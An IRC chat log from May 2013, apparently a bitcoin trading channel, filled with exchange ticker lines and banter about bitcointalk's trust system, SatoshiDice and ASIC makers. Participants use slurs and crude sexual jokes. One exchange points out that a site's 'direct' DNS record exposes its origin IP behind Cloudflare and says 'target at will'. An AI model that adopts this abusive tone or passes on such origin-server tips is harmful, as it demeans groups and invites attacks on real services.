https://bitcointalk.org/index.php?topic=211741.msg2225442#msg2225442 May 22 02:05:02 that's some prime mpoe-pr right there May 22 02:08:09 interesting, May 22 02:08:18 moderators cannot be Trusted May 22 02:08:38 [BTCTC] [TAT.ASICMINER] 25 @ 0.02597 = 0.6493 BTC [-] May 22 02:08:39 that was obvious already May 22 02:08:51 hmm wait May 22 02:08:59 this whole thread has no Trust links May 22 02:09:01 weird May 22 02:09:08 [BTCTC] [ASICMINER-PT] 1 @ 2.5253 BTC [-] May 22 02:09:40 truffles: have you also found mountains of useless bullshit? May 22 02:09:44 trust is gone! May 22 02:09:53 i guess it's a work in progress... May 22 02:10:13 ThickAsThieves: my work here is done! May 22 02:10:17 [MPEX] [O.USD.P119T] 370 @ 0.09114171 = 33.7224 BTC May 22 02:10:26 its back May 22 02:10:28 sry dub May 22 02:10:58 bitcointalk is why I don't talk to my peers about bitcoin May 22 02:11:12 for fear they will type bitcoin into google and assume I am retarded May 22 02:12:01 [HAVELOCK] [ASICM] 4 @ 0.02695 = 0.1078 BTC [+] May 22 02:12:12 dub so say that. May 22 02:12:20 dude, it's cool but don't go to retardspots. May 22 02:13:01 [HAVELOCK] [SDICE] 4 @ 0.247 = 0.988 BTC [+] May 22 02:13:03 [HAVELOCK] [SDICE] 85 @ 0.2479 = 21.0715 BTC [+] May 22 02:13:03 [HAVELOCK] [SDICE] 5 @ 0.248 = 1.24 BTC [+] May 22 02:13:04 [HAVELOCK] [SDICE] 5 @ 0.249 = 1.245 BTC [+] May 22 02:13:04 my peers are people that don't sit on the internet all day to pick out the good stuff May 22 02:13:05 [HAVELOCK] [SDICE] 8 @ 0.25 = 2 BTC [+] May 22 02:13:13 I ended up losing lots of BTC at BTCJam.com, thinking that loans are "safe". That's a holdover from the physical, regulated banking world. Not true here. I'm actually a fairly good judge of "character", so I didn't lose all, as I saw that many did there. But I did lose about 30% of what I loaned out. The site itself is fairly good, but the "borrowers" are often not... May 22 02:13:16 they are busy May 22 02:13:21 dub starty a blog. May 22 02:13:37 maybe I should May 22 02:14:04 I wonder if SDICE will do a second plunge when there's no dividend, assuming the current trend for the month keeps up. May 22 02:14:09 I'll call itstupidretards/blogspot.com May 22 02:15:09 not blogspot. May 22 02:16:27 the problem with bloging on the intertown is less time to blog on irc May 22 02:16:28 https://bitcointalk.org/index.php?topic=211741.msg2225442#msg2225442 May 22 02:16:32 oops May 22 02:16:40 dub well it was for your friends May 22 02:16:46 hi guys May 22 02:16:50 for that matter you could go "bitcoin is great and it happens on bitcoin-assets" May 22 02:16:51 makomk malaimo metabyte midnightmagic MiningBuddy mircea_popescu mjr_ mjr___ mod6 mpexbot May 22 02:16:53 hey mjr_ May 22 02:21:15 [BTCTC] [ASICMINER-PT] 1 @ 2.574 BTC [+] May 22 02:24:36 [BTCTC] [ASICMINER-PT] 3 @ 2.574 = 7.722 BTC [+] May 22 02:33:22 https://bitcointalk.org/index.php?action=trust;u=52741 May 22 02:33:40 i'm already fucing up the system May 22 02:33:45 fucking* May 22 02:34:59 [MPEX] [S.MPOE] 5600 @ 0.00067374 = 3.7729 BTC [+] May 22 02:35:00 [MPEX] [S.MPOE] 13998 @ 0.00067277 = 9.4174 BTC [-] May 22 02:36:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.02597 BTC [-] May 22 02:39:01 [HAVELOCK] [ASICM] 2 @ 0.02695001 = 0.0539 BTC [+] May 22 02:39:02 [HAVELOCK] [ASICM] 2 @ 0.02739999 = 0.0548 BTC [+] May 22 02:39:04 [HAVELOCK] [ASICM] 296 @ 0.0274 = 8.1104 BTC [+] May 22 02:43:01 [HAVELOCK] [HIM] 1 @ 2.11 BTC [-] May 22 02:44:01 [HAVELOCK] [ASICM] 100 @ 0.0274 = 2.74 BTC [+] May 22 02:44:47 [BTCTC] [ASICMINER-PT] 1 @ 2.574 BTC [+] May 22 02:45:07 [BTCTC] [ASICMINER-PT] 3 @ 2.579995 = 7.74 BTC [+] May 22 02:45:51 wow, never saw this feature of btctalk May 22 02:46:00 ppl use it ? May 22 02:46:16 [BTCTC] [TAT.ASICMINER] 65 @ 0.02597 = 1.6881 BTC [-] May 22 02:46:34 it's new May 22 02:46:43 GENIUS May 22 02:47:05 hehe May 22 02:47:10 dub ^ May 22 02:47:54 hm May 22 02:48:15 http://sarahjessicaparkerlookslikeahorse.com/ May 22 02:48:40 lol May 22 02:48:54 +trust sjp May 22 02:49:01 [HAVELOCK] [ASICM] 5 @ 0.02739998 = 0.137 BTC [-] May 22 02:50:01 [HAVELOCK] [ASICM] 20 @ 0.028 = 0.56 BTC [+] May 22 02:50:12 [BTCTC] [BITVPS] 10 @ 0.00079 = 0.0079 BTC [-] May 22 02:51:07 ok, i beg to the great wisdom of this channel : May 22 02:51:22 there was an article published about a year ago in gawker perhaps, explaining how horseface ruined new york May 22 02:51:36 by making a bunch of retarded midwesterner housewives think they can just move there and be "writers" May 22 02:51:56 supporting themsleves on the occasional piece accepted by the occasional magazine while going shopping daily May 22 02:52:01 anyone got a link ? May 22 02:52:44 agree +1 Horseface May 22 02:53:26 http://www.nypost.com/p/news/opinion/opedcolumnists/carrie_away_F2mbhFEqbCj9cC52y8wAFO May 22 02:53:28 that? May 22 02:53:50 fuck. May 22 02:53:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.02597 = 0.0779 BTC [-] May 22 02:53:52 thanks mate. May 22 02:54:02 i googled "sarah jessica parker new york false hope sex in the city ruined new york" May 22 02:54:09 LOL May 22 02:54:17 :) May 22 02:54:24 [BTCTC] [ASICMINER-PT] 9 @ 2.58 = 23.22 BTC [+] May 22 02:54:49 [BTCTC] [TAT.ASICMINER] 106 @ 0.02597 = 2.7528 BTC [-] May 22 02:55:33 lol wd May 22 02:56:09 [BTCTC] [TAT.ASICMINER] 200 @ 0.02597 = 5.194 BTC [-] May 22 02:56:14 [BTCTC] [TAT.ASICMINER] 80 @ 0.02598 = 2.0784 BTC [+] May 22 02:56:17 [BTCTC] [TAT.ASICMINER] 100 @ 0.026 = 2.6 BTC [+] May 22 02:56:19 [BTCTC] [TAT.ASICMINER] 645 @ 0.0265 = 17.0925 BTC [+] May 22 02:57:40 nah this isn't it sadly. May 22 02:57:41 [BTCTC] [TAT.ASICMINER] 8 @ 0.0265 = 0.212 BTC [+] May 22 02:57:45 i think this may be a rewrite May 22 02:57:47 sry May 22 02:57:52 [BTCTC] [ASICMINER-PT] 1 @ 2.579999 BTC [-] May 22 02:58:02 maybe sjp had it erased May 22 02:58:05 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] May 22 02:58:06 it ha sexactly the lack of byte you'd expect from two lezbos named julia that failed in ny and so moved t la May 22 02:58:07 she is rich after all May 22 02:58:39 lol May 22 02:58:43 [BTCTC] [ASICMINER-PT] 1 @ 2.579999 BTC [-] May 22 02:58:46 [BTCTC] [ASICMINER-PT] 2 @ 2.58 = 5.16 BTC [+] May 22 03:00:40 is there a theymos post about the new trust system? May 22 03:01:30 ThickAsThieves: technically, i could calculate the value of the shares i own in your AM 100PT and list that as risked BTC May 22 03:01:44 and then when it crashes and you default i can say scammed May 22 03:02:35 i think you need it to be in ripple for that. May 22 03:02:43 LOL May 22 03:03:06 he could just give me an IOU May 22 03:03:11 problem solved May 22 03:05:02 [HAVELOCK] [ASICM] 3 @ 0.02689999 = 0.0807 BTC [-] May 22 03:05:02 [HAVELOCK] [ASICM] 13 @ 0.0269 = 0.3497 BTC [+] May 22 03:06:01 [BTCTC] [ASICMINER-PT] 1 @ 2.579999 BTC [-] May 22 03:06:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.02594 = 0.0519 BTC [-] May 22 03:07:20 i for one am glad we have scammers May 22 03:07:33 imagine the alternative, no scammers at all, every single fucking thing is 100% legit May 22 03:07:41 imagine your paranoia then May 22 03:08:00 [HAVELOCK] [ASICM] 18 @ 0.0269 = 0.4842 BTC [+] May 22 03:09:07 lol May 22 03:10:58 too good to be true, and then you start doubting everything, pretty soon you are in the matrix May 22 03:10:58 if it werent for scammers, i wouldnt be able to trust anyone May 22 03:12:37 df **** ENDING LOGGING AT Wed May 22 03:28:49 2013 **** BEGIN LOGGING AT Wed May 22 03:29:11 2013 May 22 03:29:35 -NickServ- You failed to identify in time for the nickname mircea_popescu May 22 03:30:26 http://i.imgur.com/m36qE00.jpg May 22 03:30:31 this is quite priceless May 22 03:30:51 Caption: BFL Josh (left) watches studiously as Yifu and Team Avalon (pictured right) school him on ASICs and product development. May 22 03:31:46 yea its drama gold :) May 22 03:31:51 where is that? May 22 03:32:13 at the bitcoin conf May 22 03:32:49 Is he laughing about Josh's collection plate being empty? May 22 03:33:02 [HAVELOCK] [ASICM] 1 @ 0.0265 BTC [-] May 22 03:33:07 (Hey, Goat... anything exciting with you, these days?) May 22 03:34:01 haha yeah that asic wafer looks like a gold pan/sieve May 22 03:34:03 and its empty May 22 03:34:27 kakobrekla the bitfury's ? May 22 03:34:32 doh. May 22 03:34:36 wha? May 22 03:34:50 the wafer. May 22 03:34:54 o nm bfl. May 22 03:34:57 wafer is bfls May 22 03:35:14 yifu accually has the chip May 22 03:35:19 o ?! May 22 03:35:20 doesnt need no wafer to display May 22 03:35:24 yifu = avalon May 22 03:35:28 a yeah. May 22 03:35:32 thestringpuller http://trilema.com/2013/youre-the-guy-who-wasnt-good-enough-to-sling-dope/ May 22 03:36:02 [HAVELOCK] [ASICM] 100 @ 0.0269 = 2.69 BTC [+] May 22 03:36:49 Coinroll filling the demand for microgamblers: https://coinroll.it/bets May 22 03:40:03 [HAVELOCK] [SDICE] 20 @ 0.25 = 5 BTC [+] May 22 03:40:06 retards btct didnt change the direct CNAME for their server May 22 03:40:11 recipe for disaster May 22 03:41:44 [MPEX] [S.MPOE] 11394 @ 0.00067586 = 7.7007 BTC [+] May 22 03:41:58 whatcouldpossibly.jpg May 22 03:42:31 direct.btct.co resolves to 190.123.46.89 which is currently down May 22 03:43:02 [HAVELOCK] [ASICM] 37 @ 0.0267 = 0.9879 BTC [-] May 22 03:43:04 whole point of using cloudflare is to hide your server, if you keep the default "direct" CNAME you are a total moron May 22 03:44:31 ThickAsThieves: looks like its back now May 22 03:44:33 lies. May 22 03:45:02 [HAVELOCK] [ASICM] 371 @ 0.0269 = 9.9799 BTC [+] May 22 03:45:59 [BTCTC] [TAT.ASICMINER] 60 @ 0.0255 = 1.53 BTC [-] May 22 03:46:07 [BTCTC] [TAT.ASICMINER] 23 @ 0.025401 = 0.5842 BTC [-] May 22 03:46:13 [BTCTC] [TAT.ASICMINER] 35 @ 0.0254 = 0.889 BTC [-] May 22 03:46:21 [BTCTC] [TAT.ASICMINER] 15 @ 0.025313 = 0.3797 BTC [-] May 22 03:49:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.025799 = 0.0774 BTC [+] May 22 03:49:52 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] May 22 03:51:39 [BTCTC] [B.YABMC] 81 @ 0.015 = 1.215 BTC [+] May 22 03:52:37 [BTCTC] [TAT.ASICMINER] 15 @ 0.02579 = 0.3869 BTC [-] May 22 03:52:41 [BTCTC] [TAT.ASICMINER] 27 @ 0.025799 = 0.6966 BTC [+] May 22 03:53:23 [BTCTC] [TAT.ASICMINER] 15 @ 0.025799 = 0.387 BTC [+] May 22 03:54:15 [BTCTC] [PAJKA.BOND] 3 @ 0.107999 = 0.324 BTC [-] May 22 03:55:52 [BTCTC] [TAT.ASICMINER] 134 @ 0.0259 = 3.4706 BTC [+] May 22 03:57:16 [BTCTC] [B.YABMC] 51 @ 0.0155 = 0.7905 BTC [+] May 22 03:57:22 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] May 22 03:57:24 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] May 22 03:58:17 [BTCTC] [BASIC-MINING] 1 @ 0.539999 BTC [-] May 22 03:58:57 fiat500, yoah May 22 03:58:57 ;;ticker\ May 22 03:58:58 Error: "ticker\" is not a valid command. May 22 03:59:50 BTCUSD ticker | Best bid: 122.95000, Best ask: 122.96990, Bid-ask spread: 0.01990, Last trade: 122.96990, 24 hour volume: 13463.12042079, 24 hour low: 121.10000, 24 hour high: 123.08085, 24 hour vwap: 122.29576 May 22 04:00:14 direct.btct.co does not point at any btct.co hosts... May 22 04:00:39 burnside: hey burnside, curious why there's a fee on expiring bids? May 22 04:00:45 so target at will. May 22 04:01:22 ericmuyser, to encourage not using expiring bids May 22 04:01:30 more orders on the books, better volume May 22 04:01:46 or discourage using it rather, haha, okay cool May 22 04:02:06 yeah, the fee is tiny May 22 04:02:22 so then if you cancel the bid, you pay the fee? or only on trade execution May 22 04:02:37 you pay the fee when the order is placed May 22 04:02:40 no refunds. May 22 04:03:20 If it went at trade execution then it wouldn't have the intended effect May 22 04:03:20 sweet thanks May 22 04:03:23 np May 22 04:04:00 Just see the automated expiry on orders as an extra service May 22 04:04:32 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] May 22 04:04:45 burnside: oh sorry I meant the fee for playing a bid, not the fee for expiring the bid. you pay that even if you cancel? May 22 04:04:51 placing a bid* May 22 04:06:02 [HAVELOCK] [ASICM] 469 @ 0.0269 = 12.6161 BTC [+] May 22 04:06:17 ahhh, no, the 0.25% fee is applied when the trade is executed. May 22 04:07:02 [HAVELOCK] [ASICM] 284 @ 0.0269 = 7.6396 BTC [+] May 22 04:08:02 [HAVELOCK] [VTX] 2 @ 0.424 = 0.848 BTC [-] May 22 04:09:02 [HAVELOCK] [ASICM] 1 @ 0.0272 BTC [+] May 22 04:09:51 sorry about the interruption with the site btw. I introduced an infinite loop somewhere in one of the upkeep crons. Co-worker caught it before it went unresponsive and said I had a cron process eating several GB of ram. ;) May 22 04:10:02 [HAVELOCK] [ASICM] 110 @ 0.0272 = 2.992 BTC [+] May 22 04:10:12 working on tracking that down... May 22 04:11:02 [HAVELOCK] [SDICE] 1 @ 0.255 BTC [+] May 22 04:12:44 [BTCTC] [TAT.ASICMINER] 15 @ 0.02562 = 0.3843 BTC [-] May 22 04:12:46 [BTCTC] [TAT.ASICMINER] 80 @ 0.02579 = 2.0632 BTC [+] May 22 04:12:51 [BTCTC] [TAT.ASICMINER] 189 @ 0.0259 = 4.8951 BTC [+] May 22 04:13:02 [HAVELOCK] [ASICM] 733 @ 0.0269 = 19.7177 BTC [-] May 22 04:18:11 [BTCTC] [ASICMINER-PT] 1 @ 2.5799 BTC [-] May 22 04:18:13 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] May 22 04:31:46 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [+] May 22 04:32:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.025797 BTC [-] May 22 04:37:02 [HAVELOCK] [ASICM] 805 @ 0.02649 = 21.3245 BTC [-] May 22 04:37:10 [BTCTC] [TAT.ASICMINER] 79 @ 0.025797 = 2.038 BTC [-] May 22 04:37:12 [BTCTC] [TAT.ASICMINER] 98 @ 0.025798 = 2.5282 BTC [+] May 22 04:37:14 [BTCTC] [TAT.ASICMINER] 24 @ 0.025799 = 0.6192 BTC [+] May 22 04:37:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.025799 = 0.0516 BTC [+] May 22 04:42:19 [BTCTC] [ASICMINER-PT] 32 @ 2.58 = 82.56 BTC [+] May 22 04:42:39 [BTCTC] [S.DICE-PT] 1 @ 0.003379 BTC [+] May 22 04:43:02 [HAVELOCK] [ASICM] 48 @ 0.0274 = 1.3152 BTC [+] May 22 04:43:40 [BTCTC] [ASICMINER-PT] 2 @ 2.6 = 5.2 BTC [+] May 22 04:43:42 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [+] May 22 04:45:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.025799 = 0.0516 BTC [+] May 22 04:45:43 [BTCTC] [TAT.ASICMINER] 11 @ 0.025799 = 0.2838 BTC [+] May 22 04:47:05 you pay a fee for placing an order on btct? May 22 04:48:20 [BTCTC] [ASICMINER-PT] 3 @ 2.619 = 7.857 BTC [+] May 22 04:48:26 [BTCTC] [ASICMINER-PT] 3 @ 2.62 = 7.86 BTC [+] May 22 04:49:09 no May 22 04:49:13 they have a feature May 22 04:49:19 expiring orders May 22 04:49:25 which carry a fee May 22 04:49:35 right May 22 04:50:29 sup all May 22 04:50:54 sup May 22 04:51:10 im afraid my answer is unchanged May 22 04:53:31 [BTCTC] [ASICMINER-PT] 2 @ 2.629 = 5.258 BTC [+] May 22 04:53:35 hi all, if you want to see me speaking at the conference http://youtu.be/kRxAggHtqyQ May 22 04:53:41 not the best May 22 04:53:47 [BTCTC] [ASICMINER-PT] 1 @ 2.629 BTC [+] May 22 04:54:04 [BTCTC] [ASICMINER-PT] 1 @ 2.581 BTC [-] May 22 04:54:11 but i think it went ok, the guys from berlin are going to start one in that neighborhood, someone in paris wants to, as well as sydney australia May 22 04:54:36 lol May 22 04:54:36 24hr vol for AM across all PTs is about 7000btc May 22 04:54:48 its ok May 22 04:55:04 [BTCTC] [S.DICE-PT] 1 @ 0.00338 BTC [+] May 22 04:55:06 [BTCTC] [ASICMINER-PT] 1 @ 2.649 BTC [+] May 22 04:55:33 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [+] May 22 04:55:53 he seems fine to me May 22 04:56:39 [BTCTC] [ASICMINER-PT] 1 @ 2.658 BTC [+] May 22 04:56:42 [BTCTC] [ASICMINER-PT] 1 @ 2.658 BTC [+] May 22 04:56:46 [BTCTC] [ASICMINER-PT] 1 @ 2.657 BTC [-] May 22 04:57:48 [BTCTC] [S.DICE-PT] 1 @ 0.00338 BTC [+] May 22 04:58:09 mjr i didnt even realize you had gone this far with software May 22 04:58:13 pretty cool May 22 04:58:48 [BTCTC] [ASICMINER-PT] 1 @ 2.679 BTC [+] May 22 04:59:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.025899 = 1.295 BTC [+] May 22 04:59:58 "web of trust, full of scammers" May 22 05:00:02 ^ dub May 22 05:00:28 hehe May 22 05:03:09 is that like a dragons den panel May 22 05:03:18 Bad day for SDICE... May 22 05:04:09 bad months for SDICE, really May 22 05:04:42 http://i.imgur.com/L9nuyxc.png May 22 05:04:45 ThickAsThieves: you're still missing the point, I'f I;ve gone looking for the otc wot I've already crossed a lot of bridges that someone access the default community for bitcion has May 22 05:05:08 accessing May 22 05:06:43 i was referred to wot after being in bitcoin world for 2 weeks May 22 05:06:55 was sleeoing, but no. im sure you will take care of it:) May 22 05:07:32 i'm easily trolled May 22 05:07:34 ;) May 22 05:08:06 ;;ticker May 22 05:08:08 BTCUSD ticker | Best bid: 122.50001, Best ask: 122.89999, Bid-ask spread: 0.39998, Last trade: 122.90000, 24 hour volume: 13609.86893623, 24 hour low: 121.10000, 24 hour high: 123.08085, 24 hour vwap: 122.30937 May 22 05:08:17 ;;nethash May 22 05:08:19 80119.0326911 May 22 05:11:41 cool vid mjr_ May 22 05:12:00 where does sdice profit go? not in divs.. May 22 05:12:03 yeah very nice May 22 05:12:36 I actually didn't want to punch mjr in the face after watching that May 22 05:12:40 a bitcoin first May 22 05:12:45 lol May 22 05:13:02 [HAVELOCK] [ASICM] 10 @ 0.0273 = 0.273 BTC [-] May 22 05:13:06 dub: me either May 22 05:13:17 [22:12] where does sdice profit go? not in divs.. <<< what profit? May 22 05:14:21 [BTCTC] [ASICMINER-PT] 1 @ 2.658 BTC [-] May 22 05:15:01 [HAVELOCK] [ASICM] 10 @ 0.02655 = 0.2655 BTC [-] May 22 05:16:02 [HAVELOCK] [ASICM] 85 @ 0.0265 = 2.2525 BTC [-] May 22 05:17:02 [HAVELOCK] [SDICE] 3 @ 0.2384 = 0.7152 BTC [-] May 22 05:17:03 [HAVELOCK] [SDICE] 3 @ 0.23830001 = 0.7149 BTC [-] May 22 05:17:04 [HAVELOCK] [SDICE] 1 @ 0.238 BTC [-] May 22 05:17:06 [HAVELOCK] [SDICE] 1 @ 0.238 BTC [-] May 22 05:17:07 [HAVELOCK] [SDICE] 30 @ 0.2376 = 7.128 BTC [-] May 22 05:17:08 [HAVELOCK] [SDICE] 82 @ 0.2375 = 19.475 BTC [-] May 22 05:18:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02572 = 0.2572 BTC [-] May 22 05:19:03 [HAVELOCK] [SDICE] 6 @ 0.2375 = 1.425 BTC [-] May 22 05:19:03 [HAVELOCK] [SDICE] 1 @ 0.237 BTC [-] May 22 05:19:05 [HAVELOCK] [SDICE] 4 @ 0.236 = 0.944 BTC [-] May 22 05:27:25 [BTCTC] [TAT.ASICMINER] 63 @ 0.0265 = 1.6695 BTC [+] May 22 05:30:01 [BTCTC] [TAT.ASICMINER] 9 @ 0.0266 = 0.2394 BTC [+] May 22 05:31:05 [BTCTC] [TAT.ASICMINER] 12 @ 0.0265 = 0.318 BTC [-] May 22 05:31:41 [MPEX] [S.MPOE] 3600 @ 0.00067853 = 2.4427 BTC [+] May 22 05:31:43 [MPEX] [S.MPOE] 8052 @ 0.00067991 = 5.4746 BTC [+] May 22 05:32:18 [BTCTC] [ASICMINER-PT] 1 @ 2.674 BTC [+] May 22 05:32:21 [BTCTC] [ASICMINER-PT] 2 @ 2.675 = 5.35 BTC [+] May 22 05:32:26 [BTCTC] [ASICMINER-PT] 2 @ 2.676 = 5.352 BTC [+] May 22 05:32:28 [BTCTC] [ASICMINER-PT] 1 @ 2.677 BTC [+] May 22 05:33:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0266 BTC [+] May 22 05:33:31 [BTCTC] [ASICMINER-PT] 1 @ 2.679 BTC [+] May 22 05:34:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.0252 = 0.1008 BTC [-] May 22 05:35:34 [BTCTC] [TAT.ASICMINER] 80 @ 0.0266 = 2.128 BTC [+] May 22 05:38:46 [BTCTC] [TAT.ASICMINER] 13 @ 0.0266 = 0.3458 BTC [+] May 22 05:39:55 [BTCTC] [ASICMINER-PT] 2 @ 2.674 = 5.348 BTC [-] May 22 05:40:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.0266 = 0.0798 BTC [+] May 22 05:40:25 [BTCTC] [TAT.ASICMINER] 36 @ 0.0266 = 0.9576 BTC [+] May 22 05:41:31 this shit is insane May 22 05:41:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.0266 = 0.1064 BTC [+] May 22 05:41:48 i believe that right now (as of may 1st) s.dice is trading at a p/e ratio of .28 May 22 05:42:58 that is insanely undervalued May 22 05:43:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02 = 0.04 BTC [-] May 22 05:43:14 what does that change to when eric is eating cockmeat sandwich in gitmo? May 22 05:43:39 mjr_: p/e ratios might not work the same in bitcoinland May 22 05:43:39 I'd imagine Gitmo has a relatively low level of anal rape. May 22 05:44:07 you need to watch harold and kumar go to gitmo May 22 05:44:07 (though if you're eating a cockmeat sandwich.... IRC needs edit) May 22 05:44:19 dub: no one needs to watch that. May 22 05:44:28 its great May 22 05:44:33 Diablo-D3: possible May 22 05:44:39 but that is just insane for any company May 22 05:44:47 i mean under 10 usually means undervalued May 22 05:44:49 mjr_: remember, sdice is a scam and illegal May 22 05:44:54 LOL May 22 05:45:03 mjr_: so thats probably why its so low May 22 05:45:10 as bitcoin May 22 05:45:11 i'm saying that it is an order of magnitude smaller in P/E May 22 05:45:20 its earnings are historical facts May 22 05:45:23 mjr_: and 10? no May 22 05:45:25 as is its current price May 22 05:45:32 10 for p/e is rather overvalued imo May 22 05:45:39 lol May 22 05:45:40 not to most May 22 05:45:47 25 and above is normal for tech stocks May 22 05:46:02 and p/e sucks, you should be using peg for that metric May 22 05:46:03 or any company with high projected earnings May 22 05:46:09 just saying May 22 05:46:18 peg = p/e to growth May 22 05:46:21 that is an extremely low p/e, not that it means buy May 22 05:46:36 but that it is an extremely efficient company at generating profits May 22 05:46:42 yes May 22 05:46:48 there are a lot of other metrics I bet it fails May 22 05:46:58 such as not being 5 years old yet May 22 05:47:04 most of the time really low p/e either means declining profits OR very undervalued May 22 05:47:06 I wonder if SDICE could make itself autotonous to a point where there are multiple servers in diff. nations, dividends are calculated and paid by a program, etc. May 22 05:47:36 Then just take SDICE off public exchanges... May 22 05:47:40 i personally think that with bitcoin as its holdings...its earnings in USD will be awesome May 22 05:47:53 [BTCTC] [ASICMINER-PT] 3 @ 2.673 = 8.019 BTC [-] May 22 05:47:55 [BTCTC] [ASICMINER-PT] 2 @ 2.674 = 5.348 BTC [+] May 22 05:47:57 yes it's possible with colored coins May 22 05:48:01 [BTCTC] [ASICMINER-PT] 2 @ 2.678 = 5.356 BTC [+] May 22 05:48:06 [BTCTC] [ASICMINER-PT] 1 @ 2.679 BTC [+] May 22 05:48:11 [BTCTC] [ASICMINER-PT] 3 @ 2.681 = 8.043 BTC [+] May 22 05:48:13 [BTCTC] [ASICMINER-PT] 1 @ 2.688 BTC [+] May 22 05:48:14 [BTCTC] [ASICMINER-PT] 1 @ 2.699 BTC [+] May 22 05:48:16 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] May 22 05:48:18 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] May 22 05:49:42 [BTCTC] [BASIC-MINING] 1 @ 0.54 BTC [+] May 22 05:49:55 100.000.000 coins colored "Sdice" May 22 05:50:48 is so clear & simple May 22 05:51:11 Seems like SDICE would be much more valuable that way... May 22 05:53:06 using ripple to sold or buy !! we have some powerful tool ! like internet in 1995, we still do not know what to do with May 22 05:54:45 JAJAJA! May 22 05:54:59 dice would be more valuable anyone expected it to survive May 22 05:55:18 lol, i think the chances of it shutting down are lower than its p/e ratio May 22 05:55:25 its pointless to speculate with so you need the balls to hold on to it long term May 22 05:55:43 and with its recent ban from US customers the future is far from rosey May 22 05:56:07 that and its OP is an asshole May 22 05:58:01 with 20Kbtc, you stop to be an asshole, you're my best friend May 22 05:58:10 [BTCTC] [ASICMINER-PT] 3 @ 2.699 = 8.097 BTC [-] May 22 06:00:05 LOL, "shut down" to US customers May 22 06:00:13 as if the website had any purpose at all May 22 06:00:25 something has clearly spooked eric May 22 06:00:41 nah, May 22 06:00:48 its an about face from his swinging dick libertard bravado May 22 06:00:50 mjr, hard to understand for a judge May 22 06:00:53 he just figured why not, and he was coming into the states May 22 06:01:05 why not? lol May 22 06:01:07 yes, judges think he did his best effort not to service us customers May 22 06:01:28 yes, its the only purposes May 22 06:01:44 [BTCTC] [BASIC-MINING] 3 @ 0.52 = 1.56 BTC [-] May 22 06:01:44 I'm just gonn acut off one of my balls, I figure why not? May 22 06:01:52 eh, we'll see May 22 06:02:12 he never touch a $, he cut all link with US May 22 06:02:16 good for him May 22 06:02:20 good for SDICE May 22 06:02:32 yes, we will see May 22 06:03:33 all i see it's a whales, but not a good one May 22 06:04:00 [BTCTC] [TAT.ASICMINER] 58 @ 0.02659 = 1.5422 BTC [+] May 22 06:05:13 ;;google megalodon May 22 06:05:13 Megalodon - Wikipedia, the free encyclopedia: ; 10 Facts About Megalodon - Megalodon Facts: ; Prehistoric Sharks: Megalodon : Video : Discovery Channel: May 22 06:06:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.02659 = 0.2659 BTC [+] May 22 06:06:27 [MPEX] [S.MPOE] 3783 @ 0.00067744 = 2.5628 BTC [-] May 22 06:09:44 [BTCTC] [ASICMINER-PT] 2 @ 2.697 = 5.394 BTC [-] May 22 06:10:09 [BTCTC] [TAT.ASICMINER] 59 @ 0.02659 = 1.5688 BTC [+] May 22 06:13:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.02659 BTC [+] May 22 06:14:24 [BTCTC] [ASICMINER-PT] 1 @ 2.696999 BTC [-] May 22 06:20:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.02659 = 0.133 BTC [+] May 22 06:31:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.02659 = 0.1064 BTC [+] May 22 06:36:02 [HAVELOCK] [ASICM] 7 @ 0.027 = 0.189 BTC [+] May 22 06:41:01 [HAVELOCK] [ASICM] 50 @ 0.02699999 = 1.35 BTC [-] May 22 06:42:06 [BTCTC] [GSDPT] 4 @ 0.0026 = 0.0104 BTC [-] May 22 06:48:01 [HAVELOCK] [ASICM] 20 @ 0.0269 = 0.538 BTC [-] May 22 06:49:02 [HAVELOCK] [ASICM] 1 @ 0.0266 BTC [-] May 22 06:51:02 [HAVELOCK] [ASICM] 52 @ 0.0265 = 1.378 BTC [-] May 22 06:53:53 [BTCTC] [ASICMINER-PT] 2 @ 2.696999 = 5.394 BTC [-] May 22 06:56:59 [BTCTC] [ASICMINER-PT] 1 @ 2.697 BTC [+] May 22 06:59:51 [BTCTC] [ASICMINER-PT] 1 @ 2.697 BTC [+] May 22 07:03:55 [BTCTC] [TAT.ASICMINER] 22 @ 0.02655 = 0.5841 BTC [-] May 22 07:04:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02655 BTC [-] May 22 07:09:11 [BTCTC] [ASICMINER-PT] 1 @ 2.697 BTC [+] May 22 07:10:01 [HAVELOCK] [ASICM] 48 @ 0.0265 = 1.272 BTC [-] May 22 07:13:49 [MPEX] [S.MPOE] 9378 @ 0.00067824 = 6.3605 BTC [+] May 22 07:14:02 [HAVELOCK] [VTX] 1 @ 0.412208 BTC [-] May 22 07:16:02 [HAVELOCK] [ASICM] 15 @ 0.0268 = 0.402 BTC [+] May 22 07:18:01 [HAVELOCK] [ASICM] 18 @ 0.0268 = 0.4824 BTC [+] May 22 07:19:47 [BTCTC] [ASICMINER-PT] 1 @ 2.687 BTC [-] May 22 07:21:02 [HAVELOCK] [ASICM] 50 @ 0.0268 = 1.34 BTC [+] May 22 07:21:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.02655 = 0.1328 BTC [-] May 22 